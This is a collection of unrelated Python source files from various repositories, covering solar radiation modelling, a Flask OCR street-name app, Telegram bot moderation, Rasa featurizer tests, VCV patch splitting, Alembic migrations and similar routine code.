Parameters
----------
bricks : Brick or Selector
The bricks.
path : str or file
Source for loading.
"""
if isinstance(bricks, Brick):
bricks = Selector([bricks])
assert isinstance(bricks, Selector)
param_values = {name.replace("-", "/"): value
for name, value in numpy.load(path).items()}
for name, value in param_values.items():
selected = bricks.select(name)
if len(selected) == 0:
logger.error("Unknown parameter {}".format(name))
assert len(selected) == 1
selected = selected[0]
assert selected.get_value(
borrow=True, return_internal_type=True).shape == value.shape
selected.set_value(value)
params = bricks.get_params()
for name in params.keys():
if name not in param_values:
logger.error("No value is provided for the parameter {}"
.format(name))
| 1,858 |
src/hyde/model/astronomic_radiation/lib_astrorad_core.py
|
c-hydro/hyde
| 0 |
2173148
|
"""
Library Features:
Name: lib_astrorad_core
Author(s): <NAME> (<EMAIL>)
<NAME> (<EMAIL>)
Date: '20200215'
Version: '2.0.0'
"""
#######################################################################################
# Logging
import logging
import pandas as pd
import numpy as np
from src.common.default.lib_default_args import logger_name
# Logging
log_stream = logging.getLogger(logger_name)
# Debug
import matplotlib.pylab as plt
#######################################################################################
# --------------------------------------------------------------------------------
# Method to compute astronomic radiation by FAO algorithm
def execAstroRad_FAO(var_data_cf, geo_z,
time_period, time_delta,
geo_lz, geo_lm, geo_phi,
param_gsc, param_as, param_bs):
# Time information
seconds_delta = time_delta.seconds
time_delta_mid_t = time_delta.seconds / 3600 # in hour
minutes_input_step = time_delta.seconds / 60 # in minute?
# Cycle(s) on time steps
var_model_k_avg = np.zeros([time_period.__len__()])
var_model_ar_avg = np.zeros([time_period.__len__()])
var_model_k = np.zeros([geo_z.shape[0], geo_z.shape[1], time_period.__len__()])
var_model_ar = np.zeros([geo_z.shape[0], geo_z.shape[1], time_period.__len__()])
for time_id, time_step in enumerate(time_period):
# Compute cloud factor
var_data_cf_step = var_data_cf[:, :, time_id]
# Compute time information
time_delta_mid = time_delta / 2
time_mid = pd.Timestamp(time_step - time_delta_mid)
hour_mid = time_mid.hour
doy_mid = time_mid.dayofyear
# Inverse relative distance Earth-Sun
ird = 1.0 + 0.033 * np.cos(2 * np.pi / 365 * doy_mid)
b = 2 * np.pi * (doy_mid - 81) / 364.0
# Seasonal correction for solar time [h]
solar_corr = 0.1645 * np.sin(2 * b) - 0.1255 * np.cos(b) - 0.025 * np.sin(b)
# Solar declination [rad]
solar_decl = 0.4093 * np.sin(2 * np.pi / 365 * doy_mid - 1.405)
# Solar time angle at midpoint of hourly or shorter period [rad]
solar_time_angle = np.pi / 12.0 * (hour_mid + 0.06667 * (geo_lz - geo_lm) + solar_corr - 12.0)
# Solar time angle at beginning of period [rad]
solar_time_angle_start = solar_time_angle - np.pi * time_delta_mid_t / 24.0
# Solar time angle at end of period [rad]
solar_time_angle_end = solar_time_angle + np.pi * time_delta_mid_t / 24.0
# Extraterrestrial Radiation [MJ/m^2/interval] (<NAME>, 1980)
var_model_ar_step = (12 * minutes_input_step / np.pi * param_gsc * ird * (
(solar_time_angle_end - solar_time_angle_start) * np.sin(geo_phi) * np.sin(solar_decl) +
np.cos(geo_phi) * np.cos(solar_decl) * (np.sin(solar_time_angle_end) - np.sin(solar_time_angle_start))))
# Extraterrestrial Radiation [W/m^2] --> Incoming radiation
var_model_ar_step = var_model_ar_step * 10 ** 6 / seconds_delta
var_model_ar_step[var_model_ar_step <= 0.0] = 0.0
var_model_ar_step[np.isnan(var_data_cf_step)] = np.nan
# Clear-sky shortwave radiation
var_model_k_step = var_data_cf_step * (param_as + param_bs * geo_z) * var_model_ar_step
# Store K and AR results
var_model_k_avg[time_id] = np.nanmean(var_model_k_step)
var_model_ar_avg[time_id] = np.nanmean(var_model_ar_step)
var_model_k[:, :, time_id] = var_model_k_step
var_model_ar[:, :, time_id] = var_model_ar_step
# Return variable(s)
return var_model_ar, var_model_k
# --------------------------------------------------------------------------------
| 3,786 |
app.py
|
bryan-ab-smith/topocapture
| 0 |
2172843
|
#!/usr/bin/python3
import easyocr
from flask import Flask, render_template, request
import requests
from werkzeug.utils import secure_filename
import os
app = Flask(__name__)
file_dir = 'static/uploads/'
final_odonyms = {}
def getData():
root_url = 'https://bryanabsmith.com/topomapper/datafiles/'
data_files = [
'atsi',
'business',
'etc',
'euexpl',
'local',
'monarchy',
'none',
'pol',
'religious',
'transplants',
'war'
]
odonyms = {}
for theme in data_files:
print(f'Adding {theme}...')
contents = requests.get(f'{root_url}{theme}.json')
to_parse = contents.json()
for odonym in to_parse['features']:
# print(to_parse['features']['properties']['name'])
odonyms[odonym['properties']['name']] = odonym['properties']['description'], odonym['properties']['refs']
print('Removing duplicates...')
for key, value in odonyms.items():
if value not in final_odonyms:
final_odonyms[key] = value
@app.route('/upload', methods=['GET', 'POST'])
def uploadPic():
'''
To-do:
1. Run EasyOCR on the picture
reader = easyocr.Reader(['en'], gpu=False)
result = reader.readtext(img)
for x in result:
print(x[1])
2. Look up info in the database/json file
3. Render template with info
'''
# Get the file info
upload = request.files.getlist('file')[0]
# Name and location of the file on the server
full_file_name = file_dir + secure_filename(upload.filename)
# Save the uploaded file so that it can be OCR'd
upload.save(full_file_name)
# Thanks to <NAME> for the EasyOCR lines (https://www.youtube.com/watch?v=ZVKaWPW9oQY)
reader = easyocr.Reader(['en'], gpu=False)
result = reader.readtext(full_file_name)
full_text = ''
for x in result:
full_text += ' ' + x[1]
print(full_text)
os.remove(full_file_name)
for odonym in final_odonyms:
#if full_text.split(' ')[0].lower().find(full_text) > 0:
if full_text.lower().find(odonym.split(' ')[0].lower()) > -1:
#if full_text.lower().find(odonym.split(' ')[0].lower() + ' ' + odonym.split(' ')[1][:1].lower()) > 0:
# return f'{odonym} St, named for {fake_names[odonym]}.'
return f'''<blockquote class="blockquote">
<h1 class="display-6" style="color: #0dcaf0;">{odonym}</h1>
<p class="mb-0">{final_odonyms[odonym][0]}</p>
<p></p>
<p><small>{final_odonyms[odonym][1]}</small></p>
</blockquote>'''
return 'Nothing found. Try again with a different picture.'
@app.route('/')
def index():
return render_template('index.html')
if __name__ == "__main__":
getData()
app.run(host='0.0.0.0', debug=True)
| 2,929 |
AlgoGenetic3.py
|
dargor/python-guess-random-color
| 1 |
2172534
|
#
# Copyright (c) 2016, <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
from AlgoGenetic1 import AlgoGenetic1
from AlgoGenetic2 import AlgoGenetic2
class AlgoGenetic3(AlgoGenetic1, AlgoGenetic2):
OPS = AlgoGenetic1.OPS + AlgoGenetic2.OPS
def crossover(self, G1, G2, op):
if op in AlgoGenetic1.OPS:
return AlgoGenetic1.crossover(self, G1, G2, op)
elif op in AlgoGenetic2.OPS:
return AlgoGenetic2.crossover(self, G1, G2, op)
else:
raise ValueError('Unknown op')
| 1,224 |
specification/apps.py
|
Lance001Dy/AMP4OTC
| 0 |
2172018
|
from django.apps import AppConfig
class SpecificationConfig(AppConfig):
name = 'specification'
| 101 |
gooddata-metadata-client/gooddata_metadata_client/apis/__init__.py
|
jaceksan/gooddata-python-sdk
| 0 |
2172703
|
# flake8: noqa
# Import all APIs into this package.
# If you have many APIs here with many many models used in each API this may
# raise a `RecursionError`.
# In order to avoid this, import only the API that you directly need like:
#
# from .api.data_source_actions_controller_api import DataSourceActionsControllerApi
#
# or import this package, but before doing it, use:
#
# import sys
# sys.setrecursionlimit(n)
# Import APIs into API package:
from gooddata_metadata_client.api.data_source_actions_controller_api import DataSourceActionsControllerApi
from gooddata_metadata_client.api.data_source_entities_controller_api import DataSourceEntitiesControllerApi
from gooddata_metadata_client.api.data_source_layout_controller_api import DataSourceLayoutControllerApi
from gooddata_metadata_client.api.declarative_layout_controller_api import DeclarativeLayoutControllerApi
from gooddata_metadata_client.api.options_controller_api import OptionsControllerApi
from gooddata_metadata_client.api.organization_controller_api import OrganizationControllerApi
from gooddata_metadata_client.api.organization_model_controller_api import OrganizationModelControllerApi
from gooddata_metadata_client.api.organization_redirect_controller_api import OrganizationRedirectControllerApi
from gooddata_metadata_client.api.user_model_controller_api import UserModelControllerApi
from gooddata_metadata_client.api.workspace_object_controller_api import WorkspaceObjectControllerApi
| 1,473 |
setup.py
|
SidraELEzz/Sk-Checker
| 5 |
2171671
|
import os , codecs
from setuptools import setup, find_packages
pkg = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(pkg, "README.md"), encoding="utf-8") as fh:
long_description = "\n" + fh.read()
setup(
name="SidraSk",
version="0.0.1",
author="SidraELEzz",
author_email="",
description = ("tools Checker Sk"),
long_description_content_type="text/markdown",
url="https://github.com/SidraELEzz/SidraSk",
project_urls={
"Bug Tracker": "https://github.com/pypa/sampleproject/issues",
},
long_description=long_description,
packages=find_packages(),
install_requires=['requests'],
keywords=['Checker-Sk'],
classifiers=[
"Development Status :: 1 - Planning",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
]
)
| 1,106 |
lib/nuvoloso/nuvoloso/nuvoloso_helper.py
|
Nuvoloso/testing_open_source
| 0 |
2171583
|
#/usr/bin/python3
"""
Copyright 2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contains methods for convenience
"""
import logging
import subprocess
CHECK_OUTPUT_TIMEOUT = 3600
WAIT_TIMEOUT = 600
logger = logging.getLogger(__name__)
class NuvolosoHelper(object):
"""Contains methos that are often used in scripts"""
def __init__(self, args):
self.args = args
def run_check_output(self, cmd, stderr=subprocess.STDOUT, timeout=CHECK_OUTPUT_TIMEOUT,
encoding='UTF-8', shell=True):
"""Just runs a command and returns output"""
try:
logger.info("cmd: %s", cmd)
result = subprocess.check_output(cmd, stderr=stderr, timeout=timeout, encoding=encoding,
shell=shell)
if result:
result = result.strip()
logger.info(result)
return result
except subprocess.CalledProcessError as err:
logger.info("Failed to run cmd: %s, err: %s", cmd, err)
raise
def cleanup(self):
'''Cleanup'''
kops_del_cmd = "kops delete cluster --name " + self.args.kops_cluster_name + " --state " + \
self.args.kops_state_store + " --yes"
logging.info("Running cmd: %s", kops_del_cmd)
try:
# Delete kps cluster (containing app + clusterd)
result = subprocess.check_output(kops_del_cmd, stderr=subprocess.STDOUT,
timeout=CHECK_OUTPUT_TIMEOUT, encoding='UTF-8',
shell=True)
logging.info(result)
# TODO: remove the *sh and *yaml created by this test
except subprocess.CalledProcessError as err:
if err.output: logging.info(err.output)
raise
| 2,333 |
src/loadgenerator/data.py
|
Uoohasu/hipster-shop
| 54 |
2172712
|
# Copyright 2021 Lightstep
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
products = [
'0PUK6V6EV0',
'1YMWWN1N4O',
'66VCHSJNUP',
'6E92ZMYYFZ',
'L9ECAV7KIM',
'LS4PSXUNUM',
'OLJCESPC7Z',
'3R92ZDDYKL',
'3R92ZMYYKL'
]
currencies = ["EUR", "USD", "JPY", "CAD", "TRY"]
good_cards = [{
"email": "<EMAIL>",
"street_address": "101 Green Street",
"zip_code": "94111",
"city": "San Francisco",
"state": "CA",
"country": "United States",
"credit_card_number": "4529-8148-3975-2894",
"credit_card_expiration_month": "7",
"credit_card_expiration_year": "2031",
"credit_card_cvv": "409",
}, {
"email": "<EMAIL>",
"street_address": "4400 Carillon Point, Floor 4",
"zip_code": "98033",
"city": "Kirkland",
"state": "WA",
"country": "United States",
"credit_card_number": "5379759871429836",
"credit_card_expiration_month": "1",
"credit_card_expiration_year": "2032",
"credit_card_cvv": "665",
}]
bad_cards = [{
"email": "<EMAIL>",
"street_address": "60 East 42nd Street, Suite 1230",
"zip_code": "10165",
"city": "New York",
"state": "NY",
"country": "United States",
"credit_card_number": "347572753801901",
"credit_card_expiration_month": "1",
"credit_card_expiration_year": "2026",
"credit_card_cvv": "528",
}]
def random_card(bad=False):
return random.choice(bad_cards if bad else good_cards)
def random_currency():
return random.choice(currencies)
def random_product():
return random.choice(products)
def random_quantity():
return random.choice([1, 2, 3, 4, 5, 10])
| 2,151 |
extractPatchlets.py
|
millxing/Patchlets
| 7 |
2171913
|
#MIT License
#
#Copyright (c) 2019 <NAME>
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import re
import os
print('')
print("Current working directory is: " + os.getcwd())
print('')
print('')
print('Which .vcv file would you like to create patchlets from?')
fname = input("? ")
print("")
# Read contents of patch
f = open(fname + '.vcv')
A = []
for line in f:
A.append(line)
f.close()
original = A
# Extract the version of Rack (rackVersion)
temp = re.findall(r'\"(.+?)\"',A[1])
rackVersion = temp[1];
# Extract the module block (moduleBlock)
openBracket = -99
for i in range(0,len(A)):
if (A[i]== ' "modules": [\n'):
moduleBlockStart = i+1
openBracket = 1
else:
if ('[' in A[i]): openBracket = openBracket + 1
if (']' in A[i]): openBracket = openBracket - 1
if openBracket==0:
moduleBlockEnd = i
openBracket=99
moduleBlock = A[moduleBlockStart:moduleBlockEnd]
# Extract the cable block (cableBlock)
openBracket = -99
for i in range(moduleBlockEnd+1,len(A)):
if (A[i]== ' "cables": [\n'):
cableBlockStart = i+1
openBracket = 1
else:
if ('[' in A[i]): openBracket = openBracket + 1
if (']' in A[i]): openBracket = openBracket - 1
if openBracket==0:
cableBlockEnd = i
openBracket=99
cableBlock = A[cableBlockStart:cableBlockEnd]
# Create list of all the modules
modules = []; numModules = 0; openbracket = 0
for i in range(0,len(moduleBlock)):
if ('{' in moduleBlock[i]):
if openbracket==0: cc = []
openbracket = openbracket + 1
if openbracket>0:
cc.append(moduleBlock[i])
if ('}' in moduleBlock[i]): openbracket = openbracket - 1
if openbracket == 0:
numModules = numModules + 1
modules.append(cc)
# Create list of all the cables
cables = []; opencable = 0; numCables = 0
for i in range(0,len(cableBlock)):
if (cableBlock[i]== ' {\n'):
opencable = 1
cc = []
if opencable == 1:
cc.append(cableBlock[i])
if (' }' in cableBlock[i]):
opencable = 0
numCables = numCables + 1
cables.append(cc)
# Create list of all module IDs, module rows, module columns
col = []; row = []; rowrow = []; colrow = []; id = []
for i in range(0,numModules):
A = modules[i]
for j in range(0,len(A)):
if (A[j][:11] == ' "id":'):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
id.append(temp)
if A[j][:14] == ' "pos": [':
temp = re.findall(r'\d',A[j+1])
temp1 = int("".join(list(map(str,temp))))
temp = re.findall(r'\d',A[j+2])
temp2 = int("".join(list(map(str,temp))))
col.append(temp1)
row.append(temp2)
colrow.append(j+1)
rowrow.append(j+2)
# Create list of all cable inputs and outputs
outMod = []; inMod = []; outId = []; inId = []
for i in range(0,numCables):
A = cables[i]
for j in range(0,len(A)):
if (('outputModuleId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
outMod.append(temp)
if (('inputModuleId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
inMod.append(temp)
if (('outputId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
outId.append(temp)
if (('inputId') in A[j]):
temp = re.findall(r'\d',A[j])
temp = int("".join(list(map(str,temp))))
inId.append(temp)
# Create patchlets
for k in range(0,max(row)+1):
# Create the first 3 lines of a new patchlet ("{","version: #.#.#", "modules: ["})
new_file = original[0:3]
# Find leftmost x-coordinate in the row
mincol = 9999
for u in range(0,len(modules)):
if (row[u]==k):
if col[u]<mincol: mincol = col[u]
# Create new module block
# Change row to row 0
# Change x-coordinates so leftmost module is at 0
new_modules = []
for u in range(0,len(modules)):
if (row[u]==k):
modules[u][rowrow[u]] = " "+str(0)+"\n"
modules[u][colrow[u]] = " "+str(col[u]-mincol)+",\n"
new_modules.append(modules[u])
new_modules[-1][-1] = ' }\n'
new_cables = []
# Create new cable block
# Add cables to new cable block only if they only connect to modules on this row
for u in range(0,len(cables)):
inx = -99; outx = -99;
for j in range(0,len(modules)):
if inMod[u]==id[j]: inx = row[j];
if outMod[u]==id[j]: outx = row[j];
if inx==outx==k:
new_cables.append(cables[u])
if len(new_cables)>0:
new_cables[-1][-1] = ' }\n'
# Add module block to new patchlet
for u in range(0,len(new_modules)):
for j in range(0,len(new_modules[u])):
new_file.append(new_modules[u][j])
# Close module block with bracket and comma
new_file.append(' ],\n')
# Open cable block
new_file.append('"cables": [\n')
for u in range(0,len(new_cables)):
for j in range(0,len(new_cables[u])):
new_file.append(new_cables[u][j])
# Close cable block with bracket (no comma)
new_file.append(' ]\n')
# Close patch with brace
new_file.append('}\n')
# Save each new patchlet
plet_name = fname + "_" + str(k+1) + '.vcv'
f = open(plet_name,'w')
for j in range(0,len(new_file)):
f.write(new_file[j])
f.close()
print('Row ' + str(k+1) + " -> " + plet_name)
print('Extraction Completed')
| 7,843 |
run.py
|
HelloLily/slackbot
| 0 |
2170886
|
import logging
import os
from slackbot.bot import Bot
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def main():
bot = Bot()
bot.run()
if __name__ == "__main__":
main()
| 218 |
Practicals/30_Multiplication_of_matrices.py
|
dev-bhargav/Python3-for-dummies
| 0 |
2172620
|
#Matrix multiplication
import numpy.matlib
import numpy as np
print('Matrix multiply two matrices of 3×3 dimension')
print('enter elements for first matrix')
m1 = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for x in range(0, 3):
for y in range(0, 3):
m1[x][y] = int(input())
mm1 = np.asmatrix(m1)
print('enter elements for second matrix')
m2 = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for x in range(0, 3):
for y in range(0, 3):
m2[x][y] = int(input())
mm2 = np.asmatrix(m2)
print('This is first matrix')
print(mm1)
print('This is second matrix')
print(mm2)
mulm = mm1*mm2 # Multiplication of matrix
print('multiplication of matrices')
print(mulm)
| 660 |
Services/DataService/TorchDataService.py
|
carlCarlson6/NERwithBERT
| 1 |
2170850
|
from torch.utils.data import DataLoader as TorchDataLoader
from torch.utils.data import TensorDataset, RandomSampler, SequentialSampler
import common
class TorchDataService:
def PutDataIntoTorch(self, inputs, masks, tags, batchSize):
torchDataLoader = None
inputsTensor, masksTensor, tagsTensors = common.utils.TensorUtils.InputsIntoTensor(inputs=[inputs, masks, tags])
inputsLongTensor, masksLongTensor, tagsLongTensor = common.utils.TensorUtils.TensorsToLongTensors([inputsTensor, masksTensor, tagsTensors])
data = TensorDataset(inputsLongTensor, masksLongTensor, tagsLongTensor)
sampler = RandomSampler(data)
torchDataLoader = TorchDataLoader(data, sampler=sampler, batch_size=batchSize, drop_last=True)
return torchDataLoader
| 809 |
testModel.py
|
fightingzzy/DTLN_new
| 0 |
2172404
|
# importing libs
import numpy as np
import tensorflow as tf
from keras.layers import Input, Dense, GaussianNoise
from keras.models import Model
from keras import regularizers
from keras.layers.normalization import BatchNormalization
from keras.optimizers import SGD
from keras.models import load_model
import librosa
data = np.load("data.npy")
binData = float(data).to_bytes(1, 'big')
print(binData)
| 401 |
tg_bot/modules/global_kick.py
|
zinminlat/rose-upload-2
| 1 |
2173152
|
import html
from telegram import Message, Update, Bot, User, Chat, ParseMode
from typing import List, Optional
from telegram.error import BadRequest, TelegramError
from telegram.ext import run_async, CommandHandler, MessageHandler, Filters
from telegram.utils.helpers import mention_html
from tg_bot import dispatcher, OWNER_ID, SUDO_USERS, SUPPORT_USERS, STRICT_GBAN
from tg_bot.modules.helper_funcs.chat_status import user_admin, is_user_admin
from tg_bot.modules.helper_funcs.extraction import extract_user, extract_user_and_text
from tg_bot.modules.helper_funcs.filters import CustomFilters
from tg_bot.modules.helper_funcs.misc import send_to_list
from tg_bot.modules.sql.users_sql import get_all_chats
GKICK_ERRORS = {
"User is an administrator of the chat",
"Chat not found",
"Not enough rights to restrict/unrestrict chat member",
"User_not_participant",
"Peer_id_invalid",
"Group chat was deactivated",
"Need to be inviter of a user to kick it from a basic group",
"Chat_admin_required",
"Only the creator of a basic group can kick group administrators",
"Channel_private",
"Not in the chat",
"Method is available for supergroup and channel chats only",
"Reply message not found"
}
@run_async
def gkick(bot: Bot, update: Update, args: List[str]):
message = update.effective_message
user_id = extract_user(message, args)
try:
user_chat = bot.get_chat(user_id)
except BadRequest as excp:
if excp.message in GKICK_ERRORS:
pass
else:
message.reply_text("User cannot be Globally kicked because: {}".format(excp.message))
return
except TelegramError:
pass
if not user_id:
message.reply_text("You do not seems to be referring to a user")
return
if int(user_id) in SUDO_USERS or int(user_id) in SUPPORT_USERS:
message.reply_text("OHHH! Someone's trying to gkick a sudo/support user! *Grabs popcorn*")
return
if int(user_id) == OWNER_ID:
message.reply_text("Wow! Someone's so noob that he want to gkick my owner! *Grabs Potato Chips*")
return
if int(user_id) == bot.id:
message.reply_text("OHH... Let me kick myself.. No way... ")
return
chats = get_all_chats()
message.reply_text("Globally kicking user @{}".format(user_chat.username))
for chat in chats:
try:
bot.unban_chat_member(chat.chat_id, user_id) # Unban_member = kick (and not ban)
except BadRequest as excp:
if excp.message in GKICK_ERRORS:
pass
else:
message.reply_text("User cannot be Globally kicked because: {}".format(excp.message))
return
except TelegramError:
pass
GKICK_HANDLER = CommandHandler("gkick", gkick, pass_args=True,
filters=CustomFilters.sudo_filter | CustomFilters.support_filter)
dispatcher.add_handler(GKICK_HANDLER)
| 3,025 |
alembic/versions/c6e62873fe8d_create_bars_table.py
|
Unit03/aio_web_sandbox
| 0 |
2170151
|
"""Create bar table
Revision ID: c6e62873fe8d
Revises:
Create Date: 2016-03-19 20:54:39.612653
"""
# revision identifiers, used by Alembic.
revision = 'c6e62873fe8d'
down_revision = None
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
"bar",
sa.Column("id", sa.Integer, primary_key=True),
sa.Column("name", sa.String(50), nullable=False),
)
def downgrade():
op.drop_table("bar")
| 493 |
test/unit/graph_magic/test_graph_magic.py
|
Sam-Martin/graph-notebook
| 378 |
2172209
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import json
from IPython.testing.globalipapp import get_ipython
from graph_notebook.configuration.generate_config import Configuration
from test.unit.graph_magic.GraphNotebookTest import GraphNotebookTest
class TestGraphMagicLoadExt(GraphNotebookTest):
def test_load_graph_magic_succeeds(self):
res = self.ip.run_line_magic('lsmagic', '')
self.assertTrue('graph_notebook_config' in res.magics_manager.magics['line'])
def test_graph_notebook_config(self):
ip = get_ipython()
ip.magic('load_ext graph_notebook.magics')
res: Configuration = ip.run_line_magic('graph_notebook_config', '')
config_dict = res.to_dict()
self.assertEqual(self.config.to_dict(), res.to_dict())
config_dict['host'] = 'this-was-changed'
res2: Configuration = ip.run_cell_magic('graph_notebook_config', '', json.dumps(config_dict))
config_dict2 = res2.to_dict()
res3: Configuration = ip.run_line_magic('graph_notebook_config', '')
config_dict3 = res3.to_dict()
self.assertEqual(config_dict2, config_dict3)
| 1,210 |
tests/nlu/featurizers/test_featurizer.py
|
Tao2301230/rasa_learn
| 1 |
2171828
|
import numpy as np
import pytest
import scipy.sparse
from rasa.nlu.classifiers.diet_classifier import DIETClassifier
from rasa.nlu.featurizers.sparse_featurizer.count_vectors_featurizer import (
CountVectorsFeaturizer,
)
from rasa.nlu.featurizers.sparse_featurizer.lexical_syntactic_featurizer import (
LexicalSyntacticFeaturizer,
)
from rasa.nlu.tokenizers.whitespace_tokenizer import WhitespaceTokenizer
from rasa.nlu.training_data import Message, TrainingData
from rasa.nlu.featurizers.featurizer import DenseFeaturizer
from rasa.utils.features import Features
from rasa.nlu.constants import (
TEXT,
FEATURIZER_CLASS_ALIAS,
FEATURE_TYPE_SEQUENCE,
FEATURE_TYPE_SENTENCE,
)
from rasa.utils.tensorflow.constants import FEATURIZERS, SENTENCE, SEQUENCE, LABEL
def test_combine_with_existing_dense_features():
existing_features = Features(
np.array([[1, 0, 2, 3], [2, 0, 0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "test"
)
new_features = Features(
np.array([[1, 0], [0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin"
)
expected_features = np.array([[1, 0, 2, 3, 1, 0], [2, 0, 0, 1, 0, 1]])
existing_features.combine_with_features(new_features)
assert np.all(expected_features == existing_features.features)
def test_combine_with_existing_dense_features_shape_mismatch():
existing_features = Features(
np.array([[1, 0, 2, 3], [2, 0, 0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "test"
)
new_features = Features(np.array([[0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin")
with pytest.raises(ValueError):
existing_features.combine_with_features(new_features)
def test_combine_with_existing_sparse_features():
existing_features = Features(
scipy.sparse.csr_matrix([[1, 0, 2, 3], [2, 0, 0, 1]]),
FEATURE_TYPE_SEQUENCE,
TEXT,
"test",
)
new_features = Features(
scipy.sparse.csr_matrix([[1, 0], [0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin"
)
expected_features = [[1, 0, 2, 3, 1, 0], [2, 0, 0, 1, 0, 1]]
existing_features.combine_with_features(new_features)
actual_features = existing_features.features.toarray()
assert np.all(expected_features == actual_features)
def test_combine_with_existing_sparse_features_shape_mismatch():
existing_features = Features(
scipy.sparse.csr_matrix([[1, 0, 2, 3], [2, 0, 0, 1]]),
FEATURE_TYPE_SEQUENCE,
TEXT,
"test",
)
new_features = Features(
scipy.sparse.csr_matrix([[0, 1]]), FEATURE_TYPE_SEQUENCE, TEXT, "origin"
)
with pytest.raises(ValueError):
existing_features.combine_with_features(new_features)
@pytest.mark.parametrize(
"pooling, features, expected",
[
(
"mean",
np.array([[0.5, 3, 0.4, 0.1], [0, 0, 0, 0], [0.5, 3, 0.4, 0.1]]),
np.array([[0.5, 3, 0.4, 0.1]]),
),
(
"max",
np.array([[1.0, 3.0, 0.0, 2.0], [4.0, 3.0, 1.0, 0.0]]),
np.array([[4.0, 3.0, 1.0, 2.0]]),
),
(
"max",
np.array([[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]),
np.array([[0.0, 0.0, 0.0, 0.0]]),
),
],
)
def test_calculate_cls_vector(pooling, features, expected):
actual = DenseFeaturizer._calculate_sentence_features(features, pooling)
assert np.all(actual == expected)
def test_flexible_nlu_pipeline():
message = Message(data={TEXT: "This is a test message.", "intent": "test"})
training_data = TrainingData([message, message, message, message, message])
tokenizer = WhitespaceTokenizer()
tokenizer.train(training_data)
featurizer = CountVectorsFeaturizer(
component_config={FEATURIZER_CLASS_ALIAS: "cvf_word"}
)
featurizer.train(training_data)
featurizer = CountVectorsFeaturizer(
component_config={
FEATURIZER_CLASS_ALIAS: "cvf_char",
"min_ngram": 1,
"max_ngram": 3,
"analyzer": "char_wb",
}
)
featurizer.train(training_data)
featurizer = LexicalSyntacticFeaturizer({})
featurizer.train(training_data)
assert len(message.features) == 6
assert message.features[0].origin == "cvf_word"
assert message.features[0].type == FEATURE_TYPE_SEQUENCE
assert message.features[1].origin == "cvf_word"
assert message.features[1].type == FEATURE_TYPE_SENTENCE
# cvf word is also extracted for the intent
assert message.features[2].origin == "cvf_word"
assert message.features[2].type == FEATURE_TYPE_SEQUENCE
assert message.features[3].origin == "cvf_char"
assert message.features[3].type == FEATURE_TYPE_SEQUENCE
assert message.features[4].origin == "cvf_char"
assert message.features[4].type == FEATURE_TYPE_SENTENCE
assert message.features[5].origin == "LexicalSyntacticFeaturizer"
assert message.features[5].type == FEATURE_TYPE_SEQUENCE
sequence_feature_dim = (
message.features[0].features.shape[1] + message.features[5].features.shape[1]
)
sentence_feature_dim = message.features[0].features.shape[1]
classifier = DIETClassifier(
